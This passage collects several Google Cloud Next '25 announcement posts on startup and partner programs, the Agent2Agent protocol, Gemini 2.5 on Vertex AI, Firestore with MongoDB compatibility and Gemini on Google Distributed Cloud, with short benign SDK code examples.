AI research labs and model builders like Anthropic, Cohere, Magic, Mistral, and AI21 Labs are great examples. Anthropic has been using Google Cloud infrastructure to support model training and inference for several years. Google Cloud has also become an increasingly important route for organizations to access Anthropic’s models. In fact, more than 4,000 companies have started using Claude models via Vertex AI thus far.
This week at Google Cloud Next, we’re highlighting the progress that even more global startups are making toward building AI systems and applications that will create real value for people and businesses. We’ll share some of the new startups who have chosen Google Cloud as their key technology partner; new industry partnerships and resources to make it easier for early-stage startups to build and go to market on Google Cloud; new companies joining our global Accelerator programs; and more ways that startups are achieving success with Google Cloud.
Supporting more AI startups on Google Cloud
This week, we’re announcing an exciting group of startups who are launching new or expanded work with Google Cloud. These companies span a broad swath of use cases, products, and industries, including consumer apps used by millions of people, enterprise use cases like search and data analytics and storage, developer coding assistance, and solutions for unique vertical challenges. These include:
Augment Code is running its AI coding assistant, which specializes in helping developers navigate and contribute to production-grade codebases, on Google Cloud and is using Anthropic’s Claude models through Vertex AI.
Autoscience, a startup building AI agents to aid in scientific research, is using Google Cloud infrastructure and resources through our Startup Program as it begins to build and market its products.
Anysphere, the startup behind the AI-powered code editor Cursor, is now using Anthropic’s Claude models on Google Cloud to scale its AI coding assistant to more developers.
Big Sur AI now offers its AI-powered platform for retail and e-commerce customers on Google Cloud Marketplace.
Captions recently released its integration with Veo 2, making it easy for users to add B-roll content to the startup’s talking videos.
Eon.io, a startup focused on enterprise backup and recovery, has begun working with Google Cloud through our partnership with Lightspeed Capital; it’s now adding new AI search capabilities to its platform.
Features & Labels is a generative media platform for developers that accelerates the inference of gen AI models to improve the speed at which content is generated. The Fal team is working with Google Cloud to leverage its Veo 2 technology to help its users create videos with realistic motion and high-quality output.
Hebbia has integrated Gemini models into its Matrix platform, which helps organizations build AI agents capable of working across all of their data.
Magic, which is building frontier-scale models capable of understanding very large codebases, is growing its use of GPUs on Google Cloud as it accelerates research and model training.
Photoroom, a French startup that provides gen AI photo-editing and design capabilities to consumers and businesses, has used Veo 2 and Imagen 3 to improve the quality of its offering and accelerate its development.
Physical Intelligence recently partnered with Google Cloud to support model development, using our secure and scalable AI infrastructure.
Spot AI is a video AI startup that transforms passive security cameras into AI Agents for improving security, safety, and operations in industries like manufacturing, retail, hospitals, construction and more. They’re using Google Cloud to power their new interface for building custom video AI agents, called Iris.
Story is working with Google Cloud’s web3 services and infrastructure to bring new capabilities to developers on its platform.
Studyhall AI, which graduated from our UK Growth Accelerator program, has built a mobile application that uses Gemini models to help coach students on reading, writing, and exam prep.
Safe Superintelligence is partnering with Google Cloud to use TPUs to accelerate its research and development efforts toward building a safe, superintelligent AI.
Synthesia, a startup that operates an AI video platform, is using Google Cloud to build the next generation of advanced AI models that replicate realistic human likenesses and voice; the startup is also using Gemini models to handle complex vision and language-based tasks with speed and accuracy.
Ubie, a healthcare-focused startup founded in Japan, is using Gemini models via Google Cloud to power its physician assistance tool.
Udio is using TPUs to help train its models for music generation and serve its rapidly growing customer base.
Ufonia helps physicians deliver care by using AI to automate clinical consultations with patients. It is using Google Cloud’s full AI stack to power its platform, including infrastructure, models on Vertex AI Model Garden, BigQuery, and GKE.
Wagestream, a financial services startup, is using Gemini models to handle more than 80% of its internal customer inquiries, including questions about pay dates, balances, and more.
Wondercraft, an AI-powered content studio that helps users create engaging audio ads, podcasts and more, is leveraging Gemini models for some of its core functionalities and will soon release a Veo 2 integration.
New partnerships with accelerators and VCs
We’re also expanding our work with leading venture capital firms and accelerators, building on our existing relationships with firms like Sequoia and Y Combinator. These partnerships help provide technology like TPUs and Gemini models to fast-growing startups building with AI.
Today, we’re announcing a significant new partnership with the leading venture capital firm Lightspeed, which will make it easier for Lightspeed-backed startups to access technology and resources through the Google for Startups Cloud Program.
This includes upwards of $150,000 in cloud credits for Lightspeed’s AI portfolio companies, on top of existing credits available to all qualified startups through the Google for Startups Cloud Program. These credits help ensure participating startups will have more reliable access to cloud infrastructure and AI technology as they scale.
Lightspeed portfolio companies have already been using Google Cloud infrastructure, AI, and data tools, including Augment, Contextual, Grafana, and Mistral.
New resources to help startups build and go to market more quickly
Today we’re announcing new resources through the Google for Startups Cloud Program that will help startups access our infrastructure and technology more quickly.
We are also announcing our Startup Perks program, which provides early stage startups with preferred access to solutions from our partners like Datadog, Elastic, ElevenLabs, GitLab, MongoDB, NVIDIA, Weights & Biases, and more. Exclusive discounts and benefits will be added on a regular basis, helping startups build and grow with the best of the Google Cloud ecosystem.
Additionally, Google for Startups Cloud Program members will receive an additional $10,000 in credits to use exclusively on Partner Models through Vertex AI Model Garden, so they can quickly start using both Gemini models and models from partners like Anthropic and Meta.
We’re proud that 97% of companies who join our Google for Startups Cloud Program choose to stay with Google Cloud after their program credits expire, underscoring the value that our products are providing.
New accelerator cohort companies
Google Cloud currently offers a series of Accelerator programs for startups around the world. Today, we’re announcing the Spring 2025 cohort of the Google for Startups Cloud AI Accelerator for startups based in North America.
Future of AI: Perspectives for Startups
This year, we also launched our first-ever “Future of AI: Perspectives for Startups 2025” report. To gain a deeper understanding of where AI is headed, we gathered perspectives from 23 industry leaders and investors on their expectations for AI and what it means for startups in 2025 and beyond.
These experts weighed in on topics like the role of AI agents, the future of AI infrastructure, the areas startup investors are prioritizing, and much more. I encourage anyone involved in or interested in the AI startup world to take a look.
It’s this kind of fresh thinking and new technology that’s making Google Cloud a home for the startup community, and AI startups in particular — and we see Next ‘25 as an important extension of this growing ecosystem. With more than 60% of gen AI startups building on our platform today, we want to be a key partner for their innovation. This commitment to startups is ongoing, and will continue to grow with new resources, accelerators, and other programs that help them build and scale their businesses. Please be sure to visit the Startup Hub on the Mandalay Bay Expo Floor at Next ‘25 to learn more.
Since the beginning, partners have been core to Google Cloud — and that’s been especially true in the AI era. I’m amazed at the ways they have helped bring both Google’s AI innovations and their own incredible AI products and services to customers. Partners have already built more than 1,000 AI agent use cases for customers across nearly every industry.
The AI opportunity for Google Cloud partners is growing fast. For example, a new study from IDC¹ found that global systems integrators will grow their Google Cloud AI practices as much as 100% this year — and almost half of their Google Cloud AI projects have already moved into widespread production thanks to the initial ROI that customers are seeing. It’s clear that much of the opportunity ahead lies in agentic AI — and now, partners are infused at every layer of our AI agent stack.
This week at Google Cloud Next, we’re announcing updates that will help our partners build AI agents, power them with enterprise data and a choice of models, and bring them to customers, including through a new AI Agent Marketplace. We’re also launching a new open protocol, with support from more than 50 of the industry’s leading enterprise technology companies, which will allow AI agents to securely communicate in order to successfully complete tasks. And we’re enhancing the ways we go to market together, offering new incentives and resources for co-selling and training, as well as new AI offerings in Workspace for resellers.
We’re committed to helping all of our partners capitalize on the AI opportunity, whether they’re building new technology, integrating with our products, or delivering critical enterprise services.
Integrating our partners at every layer of the agentic AI stack
We’ve always taken an open approach to AI, and the same is true for agentic AI. With updates this week at Next ‘25, we’re now infusing partners at every layer of our agentic AI stack to enable multi-agent ecosystems. Here’s a closer look:
Agent2Agent (A2A) protocol: Today, we’re launching a new open protocol, with support and contributions from our partners, that will allow AI agents to communicate with each other, securely exchange information, and coordinate actions across various enterprise platforms or services like Atlassian, Box, Cohere, Intuit, LangChain, MongoDB, PayPal, Salesforce, SAP, ServiceNow, UKG, and Workday. We believe the A2A framework will add significant value for customers, whose AI agents will now be able to work across their entire enterprise application estates. More partners can begin building with the A2A framework today and can learn more in our technical blog here (a rough sketch of the basic interaction pattern follows this list).
AI Agent Marketplace: We’re also launching a new AI Agent Marketplace — a dedicated section within Google Cloud Marketplace that will easily allow customers to browse, purchase, and manage AI agents built by our partners. Today, partners like Accenture, BigCommerce, Deloitte, Elastic, UiPath, Typeface, and VMware are offering agents through our AI Agent Marketplace, with additional agents launching soon from partners like Cognizant, Slalom, and Wipro.
Power agents with all your enterprise data: Data and AI models underpin all AI agents, and our open platform and agentic AI tooling make it possible for customers to train and fine-tune agents on their entire data estates. Today, we partner with companies like NetApp, Oracle, SAP, Salesforce, and ServiceNow — meaning customers with data stored in these popular platforms can now put this data to work to improve their AI agents.
Expert AI services: Our ecosystem of services partners — including Accenture, BCG, Capgemini, Cognizant, Deloitte, HCLTech, Infosys, KPMG, McKinsey, PwC, TCS, and Wipro — have actively contributed to the A2A protocol and will support its implementation. They’ve also significantly expanded their Google Cloud practices with new experts and technical resources over the past year. This means our customers now have access to a global community of highly-trained AI experts who can help them develop AI agent use cases and strategies with interoperability in mind; prototype new applications; train and manage AI models; and ultimately deploy AI agents across their businesses.
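To make the interaction pattern concrete, here is a rough Python sketch of the discover-then-delegate flow such a protocol implies: fetch a remote agent's capability card, then send it a task over JSON-RPC. The endpoint path, method name, and payload fields are assumptions for illustration; the technical blog linked above has the authoritative schema.

```python
# Rough, hypothetical sketch of an A2A-style exchange between two agents.
import uuid
import requests

base = "https://agent.example.com"  # hypothetical remote agent

# 1. Discovery: fetch the agent's capability card (path is an assumption).
card = requests.get(f"{base}/.well-known/agent.json").json()
print("Agent skills:", [s["name"] for s in card.get("skills", [])])

# 2. Delegate a task as a JSON-RPC request (method/fields are assumptions).
task = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tasks/send",
    "params": {
        "id": str(uuid.uuid4()),
        "message": {
            "role": "user",
            "parts": [{"type": "text", "text": "Check PTO balance for employee 4521"}],
        },
    },
}
print(requests.post(card.get("url", base), json=task).json())
```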
Simplifying the ways we help partners go to market
Across the board, for all types of partners, Google Cloud is increasing resources to help them address customer demand for AI and cloud implementation services — and to better help partners identify the largest, most strategic opportunities to grow their businesses. This includes a 2x increase in funding for AI opportunities over the past year alone, and builds on the nine-figure investment in partner learning we’ve made over the past four years.
In addition, we are continuing to refine the way we go to market with partners, to ensure partners have access to the right opportunities and customers have access to the best possible technology and expertise. This includes:
Better field alignment and co-sell: Google Cloud has been co-selling with partners since our inception. Now, we’re introducing new processes to better capture and share partners’ critical contributions with our sales team. This includes increased visibility into the highly valuable co-selling activities like workshops, assessments, and proofs-of-concept, as well as partner-delivered services for migrations, application modernization, and other managed services. Ultimately, this information will better enable our sales team to connect customers with the correct ISV and services partners.
More partner earnings: We are continuing to evolve our incentives that help partners capitalize on the biggest opportunities, such as a 2x increase in partner funding for AI opportunities over the past year. We’re also introducing new AI-powered capabilities in Earnings Hub, our destination for tracking incentives and growth, which will enable partners to benchmark performance against peers, receive personalized tips on how to boost earnings, and more.
Supporting partner readiness: In the past four years, we’ve invested more than $100 million in partner training, and we are continuing to expand these efforts to help our ecosystem develop expertise in critical areas like Google Agentspace, Workspace, and more.
Making Google Workspace the best AI productivity platform for partners
More than 3 billion users and over 11 million paying customers rely on Google Workspace. Now, new enterprise-grade AI capabilities with Gemini are helping users get work done more quickly in tools like Gmail, Meet, Docs, and more. Our partners play a critical role in helping organizations around the world deploy Workspace, including providing critical migration support and training for businesses big and small.
This week at Next, we’re announcing new AI innovations in Workspace, including proactive analysis and visualization capabilities in Sheets, audio generation in Docs, a new way to automate work with AI agents in the loop, and more—all of which will make Workspace an even more attractive platform for customers and ensure partners are going to market with category-defining products. In addition, we’ve increased partner funding for Workspace opportunities by 4x over the past year, to ensure partners have the right resources and incentives to bring Workspace to customers.
With simplified pricing, an enhanced Gemini-powered feature set, and the ability to integrate Workspace with customers’ existing tools like Slack, we’re creating new and exciting opportunities for partners to create long-term, strategic engagements by implementing Workspace for customers.
Announcing 2025 partner awards winners
In closing, we’re honored to spotlight this year’s winners of Google Cloud’s partner awards, which recognize the innovation and value that partners have created for customers—particularly with AI. Our ecosystem continues to evolve to meet the needs of businesses across industries, and we’re proud of the ways they have deployed Google Cloud’s technology to address complex challenges faced by our customers. To learn more about this year’s winners, please read the complete list.
I’m excited to meet with thousands of partners this week and share ideas for how we can work together to support customers, and how we can provide a simple, effective go-to-market motion with our ecosystem. See you at Next ‘25!
1. IDC InfoBrief, sponsored by Google Cloud, Google Cloud AI: Driving Opportunity and Growth for Global Consulting & Systems Integrator Partners, doc #US53276025, April 2025
We recently announced Gemini 2.5, our most intelligent AI model yet. Gemini 2.5 models are now thinking models, capable of reasoning before responding, resulting in dramatically improved performance. This transparent step-by-step reasoning is crucial for enterprise trust and compliance.
Our first model in this family, Gemini 2.5 Pro, available in public preview on Vertex AI, is now among the world’s best models for coding and tasks requiring advanced reasoning. It has state-of-the-art performance on a wide range of benchmarks, is recognized by many users as the most enterprise-ready reasoning model, and sits at the top of the LMArena leaderboard by a significant margin.
Building on this momentum, we are launching Gemini 2.5 Flash, our workhorse model with low latency and cost efficiency on Vertex AI, our comprehensive platform for building and managing AI applications and agents, and Google AI Studio.
Let’s dive into how these capabilities are transforming AI development on Google Cloud.
Advancing enterprise problem-solving with deep reasoning
Enterprises face challenges that involve navigating intricate information landscapes, performing multi-step analyses, and making nuanced decisions – tasks that demand AI that doesn’t just process information, but reasons over it. For these situations, we offer Gemini 2.5 Pro on Vertex AI, engineered for maximum quality and for tackling the most complex tasks demanding deep reasoning and coding expertise. Coupled with a one-million-token context window, Gemini 2.5 Pro performs deep data analysis, extracts key insights from dense documents like legal contracts or medical records, and handles complex coding tasks by comprehending entire codebases.
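As a concrete illustration, here is a minimal sketch of calling Gemini 2.5 Pro for dense-document analysis through the google-genai SDK on Vertex AI. The project ID, file name, and exact preview model ID are placeholders to adapt to your environment.

```python
# Minimal sketch: long-document analysis with Gemini 2.5 Pro on Vertex AI.
from google import genai

client = genai.Client(vertexai=True, project="your-project-id", location="us-central1")

# Load a dense document (e.g., a legal contract) into the prompt; the large
# context window lets you pass very long documents directly.
with open("contract.txt") as f:
    contract_text = f.read()

response = client.models.generate_content(
    model="gemini-2.5-pro-preview-03-25",  # placeholder preview model ID
    contents=f"Extract the termination and liability clauses, with citations:\n\n{contract_text}",
)
print(response.text)
```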
“At Box, we’re redefining how enterprises apply intelligence to their content. With Box AI extract agents, powered by Gemini, users can instantly streamline tasks by making unstructured data actionable, as seen in millions of extractions supporting a variety of use cases, including procurement and reporting. Gemini 2.5 represents a leap forward in advanced reasoning, enabling us to envision building more powerful agent systems where extracted insights automatically trigger downstream actions and coordinate across multiple steps. This evolution pushes the boundaries of automation, allowing businesses to unlock and act upon their most valuable information with even greater impact and efficiency.” — Yashodha Bhavnani, VP of AI Product Management, Box
“Moody’s leverages Gemini’s advanced reasoning capabilities on Vertex AI within a model-agnostic framework. Our current production system uses Gemini 2.0 Flash for intelligent filtering and Gemini 1.5 Pro for high-precision extraction, achieving over 95% accuracy and an 80% reduction in processing time for complex PDFs. Building on this success, we are now in the early stages of testing Gemini 2.5 Pro. Its potential for deeper, structured reasoning across extensive document sets, thanks to features like its large context window, looks very promising for tackling even more complex data challenges and enhancing our data coverage further. While it’s not in production, the initial results are very encouraging.” — Wade Moss, Sr. Director, AI Data Solutions, Moody’s
To tailor Gemini for specific needs, businesses can soon leverage Vertex AI features like supervised tuning (for unique data specialization) and context caching (for efficient long context processing), enhancing performance and reducing costs. Both these features are launching in the coming weeks for Gemini 2.5 models.
Building responsive and efficient AI applications at scale
While Gemini 2.5 Pro targets peak quality for complex challenges, many enterprise applications prioritize speed, low latency, and cost-efficiency. To meet this need, we will soon offer Gemini 2.5 Flash on Vertex AI. This workhorse model is optimized specifically for low latency and reduced cost, delivering impressive and well-balanced quality for high-volume scenarios like customer service or real-time information processing. It’s the ideal engine for responsive virtual assistants and real-time summarization tools where efficiency at scale is key.
Gemini 2.5 Flash will also feature dynamic and controllable reasoning. The model automatically adjusts processing time (‘thinking budget’) based on query complexity, enabling faster answers for simple requests. You also gain granular control over this budget, allowing explicit tuning of the speed, accuracy, and cost balance for your specific needs. This flexibility is key to optimizing Flash performance in high-volume, cost-sensitive applications.
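As a hedged sketch of what that control could look like in code, the snippet below caps the thinking budget through the google-genai SDK's thinking configuration; the model ID and budget value are illustrative, and the field names should be verified against the current SDK.

```python
# Sketch: bounding Gemini 2.5 Flash's reasoning ('thinking budget') to trade
# answer depth for latency and cost on a simple, high-volume task.
from google import genai
from google.genai import types

client = genai.Client(vertexai=True, project="your-project-id", location="us-central1")

response = client.models.generate_content(
    model="gemini-2.5-flash",  # placeholder model ID
    contents="Classify this support ticket: 'My invoice total looks wrong.'",
    config=types.GenerateContentConfig(
        # Cap reasoning tokens; raise the budget for harder queries.
        thinking_config=types.ThinkingConfig(thinking_budget=256)
    ),
)
print(response.text)
```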
“Gemini 2.5 Flash’s enhanced reasoning ability, including its insightful responses, holds immense potential for Palo Alto Networks, including detection of future AI-powered threats and more effective customer support across our AI portfolio. We are focused on evaluating the latest model’s impact on AI-assistant performance, including its summaries and responses, with the intention of migrating to this model to unlock its advanced capabilities.” — Rajesh Bhagwat, VP of Engineering, Palo Alto Networks
Optimizing your experience on Vertex AI
Choosing between powerful models like Gemini 2.5 Pro and 2.5 Flash depends on your specific needs. To make this easier, we’re introducing Vertex AI Model Optimizer, an experimental capability that automatically generates the highest-quality response for each prompt based on your desired balance of quality and cost. For customers whose workloads do not require processing in a specific location, our Vertex AI Global Endpoint provides capacity-aware routing for our Gemini models across multiple regions, maintaining application responsiveness even during peak traffic or regional service fluctuations.
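For illustration, opting into the global endpoint can be as simple as passing "global" as the location when creating a client; whether a given model supports this routing is an assumption to verify for your project.

```python
# Sketch: capacity-aware routing via the Vertex AI Global Endpoint.
from google import genai

client = genai.Client(vertexai=True, project="your-project-id", location="global")
response = client.models.generate_content(model="gemini-2.5-flash", contents="Ping")
print(response.text)
```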
Powering the future with sophisticated agents and multi-agent ecosystems
Gemini 2.5 Pro’s advanced multimodal reasoning enables sophisticated, real-world agent workflows. It interprets visual context (maps, flowcharts), integrates text understanding, performs grounded actions like web searches, and synthesizes diverse information – allowing agents to interact meaningfully with complex inputs.
Building on this potential, today we are also announcing a number of innovations in Vertex AI to enable multi-agent ecosystems. One key innovation supporting dynamic, real-time interactions is the Live API for Gemini models. This API allows agents to process streaming audio, video, and text with low latency, enabling human-like conversations, participation in live meetings, or monitoring real-time situations (such as understanding spoken instructions mid-task).
Key Live API features further enhance these interactions: support for long, resumable sessions (greater than 30 minutes), multilingual audio output, time-stamped transcripts for analysis, dynamic instruction updates within sessions, and powerful tool integrations (search, code execution, function calling). These advancements pave the way for leveraging models like Gemini 2.5 Pro in highly interactive applications.
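The sketch below shows the general connect/send/receive shape of a Live API session using the google-genai SDK, here with text only; audio and video streaming follow the same pattern. The model ID and exact method names are assumptions based on the public SDK surface.

```python
# Sketch: a streaming Live API session (text modality) with google-genai.
import asyncio
from google import genai
from google.genai import types

client = genai.Client(vertexai=True, project="your-project-id", location="us-central1")

async def main():
    config = types.LiveConnectConfig(response_modalities=["TEXT"])
    # Placeholder model ID; Live API availability varies by model and version.
    async with client.aio.live.connect(
        model="gemini-2.0-flash-live-preview-04-09", config=config
    ) as session:
        await session.send_client_content(
            turns=types.Content(role="user", parts=[types.Part(text="Summarize the action items so far.")])
        )
        async for message in session.receive():
            if message.text:
                print(message.text, end="")

asyncio.run(main())
```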
Get started
Ready to tackle complex problems, build efficient applications, and create sophisticated AI agents? Try Gemini 2.5 on Vertex AI now!
Today at Google Cloud Next, we’re thrilled to announce Firestore with MongoDB compatibility, built from the ground up by Google Cloud. It provides developers with an additional choice for their demanding document database workloads.
MongoDB compatibility has been a highly requested capability from Firestore’s existing community of over 600,000 active developers. With this launch, Firestore developers can now take advantage of MongoDB’s API portability along with Firestore’s differentiated serverless service: multi-region replication with strong consistency, virtually unlimited scalability, an industry-leading high-availability SLA of up to 99.999%, and single-digit-millisecond read performance.
Combined with the ability to reuse existing MongoDB application code, drivers, and tools, as well as the open-source ecosystem of MongoDB integrations, Firestore developers can quickly build applications for common use cases, including content management systems, e-commerce product catalogs, and user profiles.
Firestore with MongoDB compatibility also offers a customer-friendly serverless pricing model, with no up-front commitments required. Customers only pay for what they use without the hidden costs of capacity planning. You can learn more about how to get started at our Firestore with MongoDB compatibility site.
“After migrating to Firestore, we improved developer productivity by 55%, observed better service reliability, and have been able to seamlessly scale to over 250,000 requests per second and 30 billion documents. Because Firestore is completely serverless and provides virtually unlimited scalability, we no longer have to worry about managing our underlying database infrastructure — liberating us from database DevOps. This has enabled us to focus on product innovations that matter to our customers,” said Karan Agarwal, director of engineering, HighLevel.
Here’s how Firestore with MongoDB compatibility is different
Developers enjoy the agility of the popular MongoDB API and query language to store and query semi-structured JavaScript Object Notation (JSON) data. With this announcement, we’re implementing the MongoDB API natively in the existing Firestore service, allowing developers to use their MongoDB drivers and integrations to read and write to Firestore with no application code changes. Developers can now build their applications with the best of the MongoDB ecosystem while benefiting from Google’s experience designing and operating highly scalable, highly available serverless document databases.
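As a minimal sketch, an existing PyMongo code path can point at Firestore simply by swapping the connection string; the URI below is a placeholder for the one shown in your database's connection settings in the console.

```python
# Sketch: unchanged MongoDB driver code running against Firestore with
# MongoDB compatibility. Only the connection string changes.
from pymongo import MongoClient

client = MongoClient("mongodb://<connection-string-from-console>")  # placeholder URI
products = client["ecommerce"]["products"]

# Standard MongoDB API calls work as-is.
products.insert_one({"sku": "GC-001", "name": "Water bottle", "price": 14.99})
for doc in products.find({"price": {"$lt": 20}}):
    print(doc["name"], doc["price"])
```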
Firestore utilizes disaggregated compute and storage layers that scale independently, in real-time. The Firestore compute layer implements multiple developer friendly APIs, including a Firestore with MongoDB compatibility API.
Benefits of Firestore with MongoDB compatibility:
1. Scale while maintaining performance, with zero intervention and downtime
At Firestore’s core is an intelligent, serverless document database service that serves some of the most demanding workloads in the world, powering more than 1.5 billion monthly active end-users. Firestore offers virtually unlimited horizontal scaling with zero customer intervention or downtime.
We’re able to do this through a differentiated backend that offers automatic, real-time rebalancing of disaggregated compute and storage that smooths out load across nodes. It allows us to add resources exactly where they are needed. We’re now able to bring the best of Google Cloud to the document databases ecosystem.
In this graph, Firestore is auto-scaling to handle a sudden database traffic spike of over 20,000 writes per second, while observing improved (lower) latency at scale.
2. Industry-leading availability
Firestore enables automatic, synchronous replication across different availability zones and regions. When any replica becomes unhealthy, Firestore will fail over to another replica with zero downtime and zero data loss. At the same time, it will apply automatic self-healing on the unhealthy replica. Unhealthy replicas will not affect processes such as automatic scaling.
Firestore handles regional and zonal failures with zero downtime and zero data loss, while applying automatic self-healing.
3. Simplified fleet management
Firestore’s integration with Database Center simplifies database fleet management and is connected with Gemini Cloud Assist’s database improvement recommendations.
4. Transparent, simple pricing
Firestore makes keeping costs in check easier than ever. Pricing is transparent, predictable and simple. For read and write operations conducted on the database, customers simply pay for the actual operations conducted, based on the size of documents and index entries in 4 kilobyte chunks for reads and 1 kilobyte chunks for writes.
There are no upfront fees or hidden costs due to challenging cluster capacity planning, mismanaged cluster sharding, or I/O charges. Customers can also attain further discounts on the pricing on the operations conducted through one-year and three-year committed-use discounts. Storage is billed for actual storage consumed, and is inclusive of automatic data replication. Customers can explore examples of applied pricing here.
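To make the chunked billing model concrete, here is a small illustrative calculation; the 4 KB read and 1 KB write chunk sizes come from the description above, while the document size is a made-up example.

```python
# Illustrative math only: operations are billed per chunk, rounded up.
import math

def read_units(doc_bytes: int, chunk: int = 4 * 1024) -> int:
    return math.ceil(doc_bytes / chunk)   # reads billed in 4 KB chunks

def write_units(doc_bytes: int, chunk: int = 1 * 1024) -> int:
    return math.ceil(doc_bytes / chunk)   # writes billed in 1 KB chunks

doc = 9_000  # a ~9 KB document (including index entries)
print(read_units(doc))   # 3 read units
print(write_units(doc))  # 9 write units
```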
5. Maximize developer flexibility
Firestore offers developers more interface choices. Coming soon, we will also offer data interoperability between Firestore’s MongoDB-compatible interface and Firestore’s real-time and offline SDKs. This will allow developers to draw on existing libraries and tools from both the MongoDB and Firestore developer communities.
Supercharge your applications with Firestore’s upcoming data interoperability, enabling you to utilize both MongoDB drivers and Firestore web & mobile SDKs on the same Firestore database.
Get started on Firestore with MongoDB compatibility
With this launch, Google Cloud is offering developers seeking a MongoDB interface multiple choices, including both MongoDB Atlas and Firestore. We’re thrilled to see what you’ll be able to achieve using Firestore with MongoDB compatibility. Firestore with MongoDB compatibility is available in preview as part of the new Firestore Enterprise edition. Get started today on Firestore with no upfront fees and a free tier.
Today we are announcing that Gemini will be available on Google Distributed Cloud (GDC), bringing Google’s most capable models to on-premises environments, with public preview starting in Q3 2025. To do so, we’ve partnered with NVIDIA to bring our Gemini models to NVIDIA Blackwell systems that you can purchase through Google or your preferred channels.
GDC is a fully managed on-prem and edge cloud solution that is offered in both connected and air-gapped options, scaling from a single server to hundreds of racks. It offers infrastructure-as-a-service, security, data, and AI services, and is extensible with a rich ISV ecosystem. GDC takes care of infrastructure management, making it easy for your developers to focus on leveraging the best that AI has to offer and build applications, assistants, and agents.
“NVIDIA and Google Distributed Cloud provide a secure AI platform, bringing Gemini models to enterprise datacenters and regulated industries. With NVIDIA Blackwell infrastructure and confidential computing, Google Distributed Cloud enhances privacy and security, and delivers industry-leading performance on DGX B200 and HGX B200 systems, available from Dell.” – Justin Boitano, VP, Enterprise AI Software, NVIDIA.
Historically, organizations that face strict regulatory, sovereignty, latency, or data volume issues have been unable to access the latest AI technology since they must keep their data on-premises. Their only options have been open-source models and tools. And, in most cases, they have to put together the software and hardware themselves, which increases operational burden and complexity. With Gemini on GDC, you don’t have to compromise between the best of AI and the need to keep your data on-premises.
Our GDC air-gapped product, which is now authorized for US Government Secret and Top Secret missions, and on which Gemini is available, provides the highest levels of security and compliance.
Gemini on GDC: unlocking generative AI anywhere
Gemini models deliver breakthrough AI performance: they can analyze million-token contexts; are multimodal, i.e., can process diverse data formats such as text, image, audio and video; and operate globally across 100+ languages.
Further, the Gemini API offers AI inferencing without having to worry about infrastructure, OS management, or model lifecycle management. This enables you to:
Add your own business context: Use Retrieval-Augmented Generation (RAG) to personalize and augment the AI model’s output, eliminating the need to fine-tune or retrain the models (a minimal RAG sketch follows this list).
Automate information processing and knowledge extraction: Improve employee efficiency by using gen AI to quickly summarize long documents, analyze sentiment in reports or feedback, or add captions to image, audio, and video content.
Create interactive conversational experiences: Build deeper customer relationships by enabling Gemini-powered customer support agents, chatbots via natural language, and employee assistants.
Tailor agents for your industry’s use case: Unlock highly specialized capabilities and workflows by developing tailored agents for everyone from financial advisors, to security assistants, to robotics.
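As a loose sketch of the RAG pattern referenced in the first item above: retrieve relevant context from an on-prem store, then ground the model's answer in it. The GDC endpoint URL, model ID, and retriever are hypothetical stand-ins; consult your GDC configuration for the real connection details.

```python
# Hypothetical sketch: grounding a Gemini call with retrieved on-prem context.
from google import genai
from google.genai import types

client = genai.Client(
    vertexai=True,
    project="your-project-id",
    location="us-central1",  # placeholder; GDC connection details will differ
    http_options=types.HttpOptions(base_url="https://gdc.internal.example"),  # hypothetical endpoint
)

def retrieve(query: str) -> list[str]:
    # Stand-in for your on-prem retrieval (e.g., Agentspace search).
    return ["Policy doc: refunds are processed within 14 business days."]

query = "How long do refunds take?"
context = "\n".join(retrieve(query))
response = client.models.generate_content(
    model="gemini-2.0-flash",  # placeholder model ID
    contents=f"Answer using only this context:\n{context}\n\nQuestion: {query}",
)
print(response.text)
```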
“Gemini on Google Distributed Cloud will empower ServiceNow to augment powerful agentic AI capabilities such as reasoning in our existing systems via robust APIs. This strategic deployment allows us to explore and implement cutting-edge advancements while upholding our commitment to customer trust and data protection.” – Pat Casey, Chief Technology Officer & EVP of DevOps, ServiceNow
Vertex AI: one platform for cloud and on-prem
In addition to bringing Gemini to Google Distributed Cloud, customers today already benefit from the Vertex AI platform on GDC, which lets them accelerate the development, deployment, and management of agentic applications.
This complete AI platform offers:
Pre-trained APIs: Ready-to-use, task-optimized, pre-trained APIs based on advanced Google models for translation, speech-to-text, and optical character recognition (OCR). These APIs offer advanced features such as customizable glossaries and in-place document translation
Gen AI building tools: Open-source and third-party models with optimized inferencing on GKE, delivering fast startup and auto-scaling
Retrieval-Augmented Generation (RAG): Grounding using Google Agentspace search, plus LLM API management and governance using Apigee on-prem
Built-in embeddings API and AlloyDB vector database: Powerful applications for personalization and recommendations, enabling improved user experiences
“With Google Distributed Cloud, Vertex AI, and Agentspace search, we will empower our Home Team innovators with a secure AI/ML platform and unified search, enabling the use of AI to enhance productivity and transform public safety for a safer and more secure future.” – Chee Wee Ang, Chief AI Officer, HTX
Google Agentspace: out-of-box access to on-prem data
Enterprises are eager to deploy gen AI, but they also struggle to connect large volumes of siloed information across various repositories and formats such as images, PDFs, and text. This hinders productivity and innovation. At the same time, building an in-house search solution is costly and requires access to scarce AI expertise.
We are excited to announce Google Agentspace search will be available on GDC, with public preview starting in Q3 2025. Google Agentspace search provides all enterprise knowledge workers with out-of-the-box capabilities that unify access to all your data in a secure, permissions-aware way.
Agentspace gives you access to:
Company-branded, multimodal search agent: A conversational search interface that can answer complex questions based on your company’s unique information, acting as a central source of enterprise truth for your entire organization
Pre-built enterprise data connectors: Connectors to index data from the most common on-prem enterprise systems (such as Confluence, Jira, ServiceNow, and SharePoint)
Permissions-aware search results: Robust access control list (ACL) enforcement that helps ensure search results are permissions-aware, maintaining security and compliance for all your on-prem data
Agentspace agents: Vertex AI is integrated out-of-the-box with Agentspace, starting with search agents, with more pre-built agents coming soon, and the ability to build your own
Get started with gen AI on GDC
We’re constantly innovating on GDC to make it the leading gen AI and modern application development platform that you can deploy anywhere. To bring Gemini and gen AI to your premises, contact us at gdc-gemini@google.com or reach out to any of our accredited global partners.
Enterprise customers are coming to Google Cloud to transform their businesses with AI, and many are turning to our seasoned experts at Google Cloud Consulting to help implement these innovations.
Working alongside our many partners, Google Cloud Consulting teams are helping customers identify the right use cases for AI, deliver them safely and securely, and then generate strong ROI. In fact, engagements focused on implementing Google Cloud AI have become the fastest-growing area within our consulting practice over the past year — indicating the tremendous level of excitement around Google’s AI offerings.
This week at Google Cloud Next, we’re leaning into this success with the launch of several new offers, delivered by Google Cloud Consulting and our partners. These are all aimed at a simple, yet important goal: making it even easier for enterprises to capitalize on our entire portfolio of AI models, AI-optimized infrastructure, AI platforms, and agentic technologies.
